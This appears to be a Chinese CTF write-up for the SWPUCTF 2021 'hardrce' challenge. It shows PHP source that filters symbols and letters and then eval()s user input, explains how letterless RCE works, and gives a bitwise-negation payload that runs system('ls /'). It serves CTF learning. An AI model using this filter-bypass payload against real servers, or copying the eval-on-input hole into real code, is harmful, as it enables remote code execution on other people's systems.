<?php

header("Content-Type:text/html;charset=utf-8");

error_reporting(0);

highlight_file(__FILE__);

if(isset($_GET['wllm']))

{

    $wllm = $_GET['wllm'];

    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];

    foreach ($blacklist as $blackitem)

    {

        if (preg_match('/' . $blackitem . '/m', $wllm)) {

        die("LTLT说不能用这些奇奇怪怪的符号哦!");

    }}

if(preg_match('/[a-zA-Z]/is',$wllm))

{

    die("Ra's Al Ghul说不能用字母哦!");

}

echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";

eval($wllm);

}

else

{

    echo "蔡总说:注意审题!!!";

}

?>

过滤了'\t','\r','\n','+','','"','-','$','*','?','<','>','=','`'

以及 [a-zA-Z] 即所有的大小写字母

如果不包含这些会执行eval函数

无字母RCE主要用到异或或者取反(只适用于php版本在7以上),如果都被ban了用自增(自 PHP 8.3.0 起,此功能已软弃用)或临时文件上传

这里使用取反绕过

payload

/?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

[SWPUCTF 2021 新生赛]hardrce(简单的无字母RCE)的更多相关文章

  1. [SWPUCTF 2021 新生赛]jicao

    CTF web安全 阅读代码可知当传入一个post型的参数id与wllmNB相等并且传入一个get型的参数json: 但是这里有一个函数json_decode,上网搜索可知json_decode这个函 ...

  2. SCNU ACM 2016新生赛初赛 解题报告

    新生初赛题目.解题思路.参考代码一览 1001. 无聊的日常 Problem Description 两位小朋友小A和小B无聊时玩了个游戏,在限定时间内说出一排数字,那边说出的数大就赢,你的工作是帮他 ...

  3. SCNU 2015ACM新生赛决赛【F. Oyk闯机关】解题报告

            题目大意:一个$N$$\times$$N$的阵列,每个格子有$X_{ij}$个调和之音,若每次只能选择走右边或下边,从左上角出发走到右下角,问最多能收集到多少个调和之音?       ...

  4. [BUUCTF]REVERSE——[ACTF新生赛2020]usualCrypt

    [ACTF新生赛2020]usualCrypt 附件 步骤: 例行检查,无壳,32位程序 32位ida载入,直接看main函数 逻辑很简单,一开始让我们输入一个字符串,然后该字符串经过sub_4010 ...

  5. [BUUCTF]REVERSE——[ACTF新生赛2020]rome

    [ACTF新生赛2020]rome 附件 步骤 无壳,32位程序 32位ida载入,根据提示字符串"You are correct!",找到关键函数func v15 = 'Q'; ...

  6. GDOU-CTF-2023新生赛Pwn题解与反思

    第一次参加CTF新生赛总结与反思 因为昨天学校那边要进行天梯模拟赛,所以被拉过去了.16点30分结束,就跑回来宿舍开始写.第一题和第二题一下子getshell,不用30分钟,可能我没想那么多,对比网上 ...

  7. Codeforces 801 A.Vicious Keyboard & Jxnu Group Programming Ladder Tournament 2017江西师大新生赛 L1-2.叶神的字符串

    A. Vicious Keyboard time limit per test 2 seconds memory limit per test 256 megabytes input standard ...

  8. [ACTF2020 新生赛]BackupFile && [ACTF2020 新生赛]Upload &&[GYCTF2020]Blacklist

    [ACTF2020 新生赛]BackupFile 尝试找到源代码,加上题目是备份文件,猜测备份文件里面有网站的源代码,御剑扫描一下,就扫到index.php 访问index.php.bak 下载源代码 ...

  9. [BUUCTF]REVERSE——[ACTF新生赛2020]Oruga

    [ACTF新生赛2020]Oruga 附件 步骤: 例行检查,64位程序,无壳 64位ida载入,检索字符串,根据提示来到关键函数 14行~18行就是让字符串的前5位是 actf{ ,sub_78A( ...

  10. [BUUCTF]REVERSE——[ACTF新生赛2020]easyre

    [ACTF新生赛2020]easyre 附件 步骤 查壳,32位程序,upx壳儿 脱完壳儿,扔进ida 分析 一开始给我们定义了一个数组, v4=[42,70,39,34,78,44,34,40,73 ...

随机推荐

  1. Blazor学习之旅(10)多语言+本地化

    大家好,我是Edison. 在上一篇我提到了接下来会介绍一下如何在Blazor中实现多语言,这就安排上了. 多语言+本地化的背景 在Web应用开发中,我们可能会有一些需要多语言+本地化的场景,特别在一 ...

  2. C# WinForm 多线程启动提示 DragDrop 注册失败

    https://blog.csdn.net/educast/article/details/7954242 这种情况是由多线程引起的,在项目中遇到过这样的情况,查了一下网上的解决方法...汗,都不行. ...

  3. 获奖公告|RestCloud应用场景分享征稿大赛

  4. freeswitch笔记(1)-mac环境安装

    freeswitch是啥就不多说了,可以简单理解为一个功能强大的纯软件实现的电话交换机(俗称:软交换).官网地址:https://freeswitch.com/,它可以运行于windows/mac/l ...

  5. inux中设置固定ip(亲测有效)-九五小庞

    首先打开虚拟机 打开xshell5连接虚拟机(比较方便,这里默认设置过Linux的ip,只是不固定) 输入ifconfig,可以查看网管相关配置信息: 然后输入 vi /etc/sysconfig/n ...

  6. CF937Div4E :分段比较

    Nearly Shortest Repeating Substring 题面翻译 给你一个长度为 \(n\) 的字符串 \(s\) ,它由小写字母组成.求最短字符串 \(k\) 的长度,使得多个(可能 ...

  7. 《刚刚问世》系列初窥篇-Java+Playwright自动化测试-24- 操作Select下拉选择框 - 上篇(详细教程)

    1.简介 在实际自动化测试过程中,我们也避免不了会遇到下拉框选择的测试,因此宏哥在这里直接分享和介绍一下,希望小伙伴或者童鞋们在以后工作中遇到可以有所帮助.今天,我们讲下playwright的下拉框怎 ...

  8. [置顶] WHO AM I ?

    我是一名又菜又爱玩的做题家(什么也不会的大学生 会在这里发出我觉得有意思的题目以及一些好玩的trick 同时如果手机端的同学想要看算法竞赛比赛题解的话可以移步至我的知乎 link

  9. 计算ip地址

    例如: ip:192.168.9.3 子网掩码:255.255.254.0 网关:192.168.9.1 1:IP地址 = 网络地址 + 主机地址,二进制为: 11000000 10101000 00 ...

  10. CF893C Rumor (并查集)

    codeforces地址:https://codeforces.com/problemset/problem/893/C CF893C Rumor 题目描述 Vova promised himself ...